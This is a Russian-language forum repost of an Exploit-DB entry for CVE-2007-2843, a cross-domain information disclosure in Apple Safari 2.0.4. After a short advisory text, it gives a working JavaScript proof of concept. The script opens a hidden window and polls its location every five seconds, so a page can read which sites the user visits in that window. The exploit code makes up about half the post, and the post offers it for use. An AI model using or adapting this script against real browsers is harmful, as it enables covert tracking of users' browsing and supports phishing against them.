Exploit Apple Safari 2.0.4 - Cross-Domain Browser Location Information Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
30078
Проверка EDB
  1. Пройдено
Автор
GARETH HEYES
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2007-2843
Дата публикации
2007-05-23
Код:
source: https://www.securityfocus.com/bid/24121/info

Apple Safari is prone to an information-disclosure vulnerability because it fails to properly enforce cross-domain JavaScript restrictions.

Exploiting this issue may allow attackers to access locations that a user visits, even if it's in a different domain than the attacker's site. The most common manifestation of this condition would typically be in blogs or forums. Attackers may be able to access potentially sensitive information that would aid in phishing attacks.

This issue affects Safari 2.0.4; other versions may also be affected. 

var snoopWin;

function run() {
	snoopWin = window.open('http://www.google.com/','snoopWindow','width=640,height=480');
	snoopWin.blur();
	setTimeout("snoopy()", 5000);	
}

function snoopy() {
	alert(snoopWin.location);
	setTimeout("snoopy()", 5000);
}
 
Источник
www.exploit-db.com

Похожие темы